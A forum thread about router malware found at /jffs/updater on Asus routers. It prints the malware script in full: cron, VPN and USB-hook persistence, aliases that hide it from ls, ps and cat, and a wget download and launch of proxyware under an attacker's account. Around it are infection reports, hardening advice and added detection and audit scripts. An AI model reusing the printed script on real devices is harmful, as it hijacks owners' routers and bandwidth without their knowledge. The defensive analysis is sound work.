Malware /jffs/updater script.

This seems concerning if no one knows where this came from and there have been multiple reports 😒
 
What is this random /jffs/updater script?
Malware of some sort. There was another discussion last week about that malware:

The obvious question is how is this getting on the router?
Probably going to need more information posted by those affected; specific router, firmware, scripts, external ports open, external access, VPN usage, etc.
Those infected will want to double check all network devices for any sort of malware/spyware/virus infections. Disable any remote access. And change any WiFi passwords, router admin password, and any VPN usage passwords as well just in case.
 
What is this random /jffs/updater script?

Bash:
#!/bin/sh

if ls /jffs/p32
then
    exit
fi

cru a updater "* * * * * /jffs/updater"

nvram set vpn_server1_custom='up "/bin/sh /jffs/updater"
script-security 3'
if nvram get vpn_server1_state | grep 2
then
    echo ""
else
    nvram set vpn_server1_state=2
    nvram set vpn_server1_nm=255.255.255.0
    nvram set vpn_server1_local=10.8.0.1
    nvram set vpn_server1_hmac=-1
    nvram set vpn_server1_errno=0
    nvram set vpn_server1_rgw=0
    nvram set vpn_server1_poll=0
    nvram set vpn_server1_reneg=-1
    nvram set vpn_server1_r1=192.168.1.50
    nvram set vpn_server1_r2=192.168.1.55
    nvram set vpn_server1_pdns=0
    nvram set vpn_server1_if=tun
    nvram set vpn_server1_custom=up "/bin/sh /jffs/updater"
    nvram set vpn_server1_remote=10.8.0.2
    nvram set vpn_server1_comp=yes
    nvram set vpn_server1_tls_keysize=0
    nvram set vpn_server1_firewall=auto
    nvram set vpn_server1_ccd=0
    nvram set vpn_server1_sn=10.8.0.0
    nvram set vpn_server1_digest=SHA1
    nvram set vpn_server1_c2c=0
    nvram set vpn_server1_state=2
    nvram set vpn_server1_crypt=tls
    nvram set vpn_server1_plan=1
    nvram set vpn_server1_ccd_excl=0
    nvram set vpn_server1_proto=udp
    nvram set vpn_server1_igncrt=0
    nvram set vpn_server1_cipher=AES-128-CBC
    nvram set vpn_server1_dhcp=1
    nvram set vpn_server1_port=31194
fi

nvram set vpn_server_custom='up "/bin/sh /jffs/updater"
script-security 3'
if nvram get vpn_server_state | grep 2
then
    echo ""
else
    nvram set vpn_server_state=2
    nvram set vpn_server_nm=255.255.255.0
    nvram set vpn_server_local=10.8.0.1
    nvram set vpn_server_hmac=-1
    nvram set vpn_server_errno=0
    nvram set vpn_server_rgw=0
    nvram set vpn_server_poll=0
    nvram set vpn_server_reneg=-1
    nvram set vpn_server_r1=192.168.1.50
    nvram set vpn_server_r2=192.168.1.55
    nvram set vpn_server_pdns=0
    nvram set vpn_server_if=tun
    nvram set vpn_server_custom=up "/bin/sh /jffs/updater"
    nvram set vpn_server_remote=10.8.0.2
    nvram set vpn_server_comp=yes
    nvram set vpn_server_tls_keysize=0
    nvram set vpn_server_firewall=auto
    nvram set vpn_server_ccd=0
    nvram set vpn_server_sn=10.8.0.0
    nvram set vpn_server_digest=SHA1
    nvram set vpn_server_c2c=0
    nvram set vpn_server_state=2
    nvram set vpn_server_crypt=tls
    nvram set vpn_server_plan=1
    nvram set vpn_server_ccd_excl=0
    nvram set vpn_server_proto=udp
    nvram set vpn_server_igncrt=0
    nvram set vpn_server_cipher=AES-128-CBC
    nvram set vpn_server_dhcp=1
    nvram set vpn_server_port=31723
fi

nvram set jffs2_exec='ash /jffs/updater'
nvram set script_usbmount='ash /jffs/updater'
nvram set script_usbumount='ash /jffs/updater'

nvram commit

if cat ~/.profile | grep "alias ls='f()"
then
    echo ""
else
    echo "alias ls='f(){ ls \"\$@\" | grep -v updateservice | grep -v updater | grep -v .profile; unset -f f; }; f'" >> ~/.profile
    echo "alias ps='f(){ ps \"\$@\" | grep -v updateservice | grep -v updater; unset -f f; }; f'" >> ~/.profile
    echo "alias cat='f(){ cat \"\$@\" | grep -v updater | grep -v updateservice; unset -f f; }; f'" >> ~/.profile
fi

if ps | grep updateservice | grep -v grep
then
    echo "Running"
else
    if test -s /tmp/updateservice
    then
        echo " "
    else
        rm /tmp/updateservice
        if cat /proc/cpuinfo | grep -i ARMv7
        then
            wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli
            chmod u+x /tmp/updateservice
        fi
    fi
    if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
    then
        echo " "
    else
        rm /tmp/updateservice
        wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
        chmod u+x /tmp/updateservice
        if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
        then
            echo " "
        else
            rm /tmp/updateservice
            wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv6l/pawns-cli
            chmod u+x /tmp/updateservice
            if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
            then
                echo " "
            else
                rm /tmp/updateservice
                wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_aarch64/pawns-cli
                chmod u+x /tmp/updateservice
                /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
            fi
        fi
    fi
fi

Code:
* * * * * /jffs/updater #updater#

@RMerlin is this a default script?
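For anyone who wants to check a router, or files pulled off one, for the hooks this script plants, here is an added example written for this thread. It is not the malware, not Skynet and not firmware code. It scans plain-text copies of `nvram show`, `cru l` and ~/.profile for the persistence the script above sets up (the per-minute cron entry, the OpenVPN server "custom config" up-script, the jffs2_exec and USB mount hooks, and the ls/ps/cat aliases that hide it). The sample inputs inside are constructed to mirror the posted script, not captured from an infected unit. One caveat the aliases make important: on a live router, collect ~/.profile with `command cat` (or from a non-interactive `sh` script), since the alias only affects an interactive shell and would otherwise filter its own lines out of what you see.

```shell
#!/bin/sh
# Added example for this thread, not code from the malware, Skynet or the firmware.
# Offline scan for the /jffs/updater persistence hooks. Inputs are text files so it
# can run on a workstation. On an Asuswrt-Merlin router, collect them with:
#   nvram show > /tmp/nv.txt 2>/dev/null      # the size line goes to stderr
#   cru l > /tmp/cru.txt
#   command cat /root/.profile > /tmp/prof.txt  # `command` bypasses the planted alias

INDICATOR='/jffs/updater'

# Each scan_* prints one finding per line, prefixed with its source. A grep with no
# match exits non-zero, but the trailing sed decides the pipeline status, so the
# functions are safe under `set -e`.
scan_nvram() {   # $1 = file holding `nvram show` output
    # Hook keys the script sets. nvram show prints a multi-line value such as
    # vpn_server1_custom across lines; the key line still carries the path.
    grep -E "^(jffs2_exec|script_usbmount|script_usbumount|vpn_server[0-9]*_custom)=.*$INDICATOR" "$1" \
        | sed 's/^/nvram: /'
    # The two OpenVPN server instances the script turns on so its up-script runs.
    grep -E '^vpn_server[0-9]*_port=(31194|31723)$' "$1" | sed 's/^/nvram: /'
}

scan_cron() {    # $1 = file holding `cru l` output
    grep -F "$INDICATOR" "$1" | sed 's/^/cron: /'
}

scan_profile() { # $1 = copy of ~/.profile
    grep -E "^alias (ls|ps|cat)=.*grep -v (updater|updateservice)" "$1" | sed 's/^/profile: /'
}

# Total number of findings across the three sources; 0 means nothing was found.
count_findings() {   # $1 = nvram dump, $2 = cru listing, $3 = .profile
    { scan_nvram "$1"; scan_cron "$2"; scan_profile "$3"; } | wc -l | tr -d ' '
}

# Constructed sample inputs (an infected router and a clean one), written into
# directory $1. The *_bad files mirror what the posted script writes.
write_samples() {
    cat > "$1/nv_bad.txt" <<'EOF'
ddns_enable_x=0
vpn_server1_custom=up "/bin/sh /jffs/updater"
script-security 3
vpn_server1_port=31194
vpn_server1_state=2
jffs2_exec=ash /jffs/updater
script_usbmount=ash /jffs/updater
script_usbumount=ash /jffs/updater
EOF
    printf '* * * * * /jffs/updater #updater#\n' > "$1/cru_bad.txt"
    cat > "$1/prof_bad.txt" <<'EOF'
alias ls='f(){ ls "$@" | grep -v updateservice | grep -v updater | grep -v .profile; unset -f f; }; f'
alias ps='f(){ ps "$@" | grep -v updateservice | grep -v updater; unset -f f; }; f'
alias cat='f(){ cat "$@" | grep -v updater | grep -v updateservice; unset -f f; }; f'
EOF
    printf 'ddns_enable_x=0\nvpn_server1_port=1194\njffs2_exec=\n' > "$1/nv_ok.txt"
    printf '0 5 * * * /jffs/scripts/backup.sh #backup#\n' > "$1/cru_ok.txt"
    printf 'export PATH=/opt/bin:$PATH\n' > "$1/prof_ok.txt"
}

# Demo run against the constructed samples.
demo() {
    d=$(mktemp -d)
    write_samples "$d"
    echo "infected sample: $(count_findings "$d/nv_bad.txt" "$d/cru_bad.txt" "$d/prof_bad.txt") finding(s)"
    scan_nvram "$d/nv_bad.txt"; scan_cron "$d/cru_bad.txt"; scan_profile "$d/prof_bad.txt"
    echo "clean sample: $(count_findings "$d/nv_ok.txt" "$d/cru_ok.txt" "$d/prof_ok.txt") finding(s)"
    rm -rf "$d"
}
demo
```

A non-zero count is a reason to treat the router as compromised rather than just delete the files: the script re-arms itself from cron, from the OpenVPN up hook and from the USB mount hooks, so all of those need clearing before a reboot, and the credentials the thread already lists (admin, Wi-Fi, VPN) should be changed afterwards.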
Although I don't use it, I'm curious if you (or any of the others who've reported this that may be reading) had aiProtection turned on and if it alerted to anything. Also curious, same as the others, HOW this got on the router and agree that more details are needed about add-ons, open ports, vpns, etc.
 
Malware of some sort. There was another discussion last week about that malware:

The obvious question is how is this getting on the router?
Probably going to need more information posted by those affected; specific router, firmware, scripts, external ports open, external access, VPN usage, etc.
Those infected will want to double check all network devices for any sort of malware/spyware/virus infections. Disable any remote access. And change any WiFi passwords, router admin password, and any VPN usage passwords as well just in case.
Another possible attack vector would be from a compromised machine or mobile device on the internal network that performed a network scan, and found a way to get onto the router. Unless there's an undisclosed vulnerability that allowed it to be copied/executed on the router, it may have been able to grab the router credentials somehow. It would be interesting to know if the username was still "admin", and whether the password was weak or not...

And I'm not finding anything online about this... Hmm.
 
Malware of some sort. There was another discussion last week about that malware:

The obvious question is how is this getting on the router?
Probably going to need more information posted by those affected; specific router, firmware, scripts, external ports open, external access, VPN usage, etc.
Those infected will want to double check all network devices for any sort of malware/spyware/virus infections. Disable any remote access. And change any WiFi passwords, router admin password, and any VPN usage passwords as well just in case.

I agree with everything @bennor and @ATLga mentioned here, @Swistheater... would you be willing to give us any further details? I know you're probably going through a reset cycle at the moment... but when you come up for air! :)

PS. Have you also done a sweep across your PCs, laptops and mobile devices as well, to look for any possible intruders from that front?
 
I've pushed v7.4.2 for Skynet which should detect and remove this malware (or cripple it at least).
 
@Swistheater created the script and asks for expert opinion before releasing it into the wild. :D
I guess I should execute it to see what things I can help suggest need fixing! :p
 
I've pushed v7.4.2 for Skynet which should detect and remove this malware (or cripple it at least).
Fighting scripts with scripts... nice work, @Adamm ;)

And yes... I was feverishly checking my syslog for this after it came back up... LOL

Code:
logger -st Skynet "[!] Warning! Router Malware Detected (/jffs/updater) - Investigate Immediately!"
 
I also feel more secure now...
Thanks @Adamm
 
I also feel more secure now...

It goes to show what an amazing community this is... As soon as a major potential threat is identified, people are pounding on this trying to figure out the cause/source, and others like @Adamm are building detections into their scripts to remove it, or at least hobble it. ON THE SAME DAY NO LESS! :)
 
It goes to show what an amazing community this is... As soon as a major potential threat is identified, people are pounding on this trying to figure out the cause/source, and others like @Adamm are building detections into their scripts to remove it, or at least hobble it. ON THE SAME DAY NO LESS! :)
You are absolutely right :D

P.S: You are also one of them in my book.
 
It goes to show what an amazing community this is... As soon as a major potential threat is identified, people are pounding on this trying to figure out the cause/source, and others like @Adamm are building detections into their scripts to remove it, or at least hobble it. ON THE SAME DAY NO LESS! :)

It is great, but unfortunately, 99% of ASUS router users will not see this.
 
Wow. Did you just happen to find this sitting under the /jffs folder after noticing wget commands? Were you watching htop? How did you find it?
First thing I noticed was abnormal CPU spikes. My CPU was thrashing and there was no network traffic taking place on my network that warranted the level of thrashing taking place.
 
It goes to show what an amazing community this is... As soon as a major potential threat is identified, people are pounding on this trying to figure out the cause/source, and others like @Adamm are building detections into their scripts to remove it, or at least hobble it. ON THE SAME DAY NO LESS! :)
Crazy that it was like that. I saw wget going across htop. From seeing the htop, I was able to determine the script's location in jffs.
 
Malware of some sort. There was another discussion last week about that malware:

The obvious question is how is this getting on the router?
Probably going to need more information posted by those affected; specific router, firmware, scripts, external ports open, external access, VPN usage, etc.
Those infected will want to double check all network devices for any sort of malware/spyware/virus infections. Disable any remote access. And change any WiFi passwords, router admin password, and any VPN usage passwords as well just in case.
Although I don't use it, I'm curious if you (or any of the others who've reported this that may be reading) had aiProtection turned on and if it alerted to anything. Also curious, same as the others, HOW this got on the router and agree that more details are needed about add-ons, open ports, vpns, etc.
The scripts I had installed are listed in the signature except @Viktor Jaep script VPNMON-R2 which I have not used in a few months since I canceled my VPN services. No ports were open. Remote access disabled. AiProtect was turned on, I forgot to save its history before nuking the router. VPN services have been turned off for the last three months. Script had a time stamp of May 2, 2023.
 
Interesting subject, but how did this script end up on the router? Without user intervention, is it possible?

This link in the script points to Pawns.app (proxy service):

Code:
hxxps://download.iproyal.com/pawns-cli/latest/linux_armv6l/pawns-cli

It seems to be a way to use internet bandwidth, explained here:

Code:
https://peppe8o.com/pawns-raspberry-pi-passive-income/

The email account comes from this service (which, e.g., also has a VPN service):

Code:
https://proton.me/mail

Some versions of 384 code had a vulnerability that let people in from the WAN if you had WAN access enabled, even if they didn't have your password. Even on 386, they can brute force or try common passwords and get in. Seems to be botnets programmatically attacking Asus routers, in fact once your router is infected one of the functions is probably to find and attack other routers.

WAN http/https access should be disabled. Ideally SSH too. If you must have SSH enabled to the WAN I would not only have a very strong password but also restrict it to only a client key that you give yourself. Merlin also rate limits SSH failed logins so that helps protect against brute force, but I'd still restrict the key.

Vulnerabilities in VPN could also give someone access to your router.
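As an added example for the advice in the post above (not code from the firmware, from Merlin or from any add-on), here is an offline audit of those exposure settings read from a saved `nvram show` dump, with constructed sample dumps for a wide-open and a locked-down router. The key names are the ones Asuswrt-Merlin uses for these settings, but treat the exact names and values as assumptions and confirm them on your build with `nvram show | grep -E 'misc_http_x|sshd_'` before acting on the output.

```shell
#!/bin/sh
# Added example for this thread, not firmware or add-on code. Audits remote-exposure
# settings from a saved `nvram show` dump. Key names/values assumed from Asuswrt-Merlin:
#   misc_http_x    1 = web UI reachable from the WAN
#   sshd_enable    0 = off, 1 = LAN + WAN, 2 = LAN only
#   sshd_pass      1 = password login allowed, 0 = authorized keys only
#   sshd_bfp       1 = SSH brute-force protection (rate limiting) on
#   http_username  name of the admin account

nv() {   # $1 = dump file, $2 = key; prints the value, or nothing if absent
    sed -n "s/^$2=//p" "$1" | head -n 1
}

# Prints one "WARN: ..." line per risky setting and nothing when hardened.
audit_exposure() {   # $1 = `nvram show` dump
    f=$1
    [ "$(nv "$f" misc_http_x)" = "1" ] && echo "WARN: web UI is reachable from the WAN (misc_http_x=1)"
    case "$(nv "$f" sshd_enable)" in
        1)  echo "WARN: SSH is reachable from the WAN (sshd_enable=1)"
            [ "$(nv "$f" sshd_pass)" = "1" ] && echo "WARN: SSH accepts passwords from the WAN; use keys only (sshd_pass=0)"
            [ "$(nv "$f" sshd_bfp)" = "1" ] || echo "WARN: SSH brute-force protection is off (sshd_bfp=0)" ;;
    esac
    [ "$(nv "$f" http_username)" = "admin" ] && echo "WARN: admin account is still named 'admin'"
    return 0
}

count_warnings() {   # $1 = dump; number of WARN lines
    audit_exposure "$1" | wc -l | tr -d ' '
}

# Prints (does not run) the nvram commands that close the WAN-facing findings.
# Review them, then run, `nvram commit`, and restart httpd/sshd or reboot.
hardening_commands() {
    echo "nvram set misc_http_x=0"
    echo "nvram set sshd_enable=2"
    echo "nvram set sshd_pass=0"
    echo "nvram set sshd_bfp=1"
    echo "nvram commit"
}

# Constructed sample dumps written into directory $1: one exposed, one hardened.
write_samples() {
    printf 'misc_http_x=1\nsshd_enable=1\nsshd_pass=1\nsshd_bfp=0\nhttp_username=admin\n' > "$1/nv_exposed.txt"
    printf 'misc_http_x=0\nsshd_enable=2\nsshd_pass=0\nsshd_bfp=1\nhttp_username=netops\n' > "$1/nv_hardened.txt"
}

demo() {
    d=$(mktemp -d)
    write_samples "$d"
    echo "exposed sample: $(count_warnings "$d/nv_exposed.txt") warning(s)"
    audit_exposure "$d/nv_exposed.txt"
    echo "hardened sample: $(count_warnings "$d/nv_hardened.txt") warning(s)"
    echo "to fix the exposed sample:"; hardening_commands
    rm -rf "$d"
}
demo
```

The audit only reads a dump, so it is safe to run against a router you suspect; the `hardening_commands` output is printed for review rather than applied, because the web UI is the less error-prone place to make these changes and it restarts the affected services for you.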
 
Some versions of 384 code had a vulnerability that let people in from the WAN if you had WAN access enabled, even if they didn't have your password. Even on 386, they can brute force or try common passwords and get in. Seems to be botnets programmatically attacking Asus routers, in fact once your router is infected one of the functions is probably to find and attack other routers.

WAN http/https access should be disabled. Ideally SSH too. If you must have SSH enabled to the WAN I would not only have a very strong password but also restrict it to only a client key that you give yourself. Merlin also rate limits SSH failed logins so that helps protect against brute force, but I'd still restrict the key.

Vulnerabilities in VPN could also give someone access to your router.
The weird thing is I noticed an issue where the router would go for spells where my internet services kept getting interrupted. My AiMesh nodes kept experiencing heavy interference from the CPU throttling taking place every time the wget command ran. I really noticed the anomalous behaviors once I started noticing my nodes' connections dropping in and out. I started inspecting the router at that point. I looked at htop to determine what culprit was causing the high CPU usage issue. I was expecting Diversion and the dnsmasq log, but nope, it was a script running a wget command.
 
I was expecting Diversion and DNSMASQ log, but nope it was a script running a wget command.
;)

FYI All wget and curl commands are auto-logged to /jffs/wglst and /jffs/curllst respectively.
 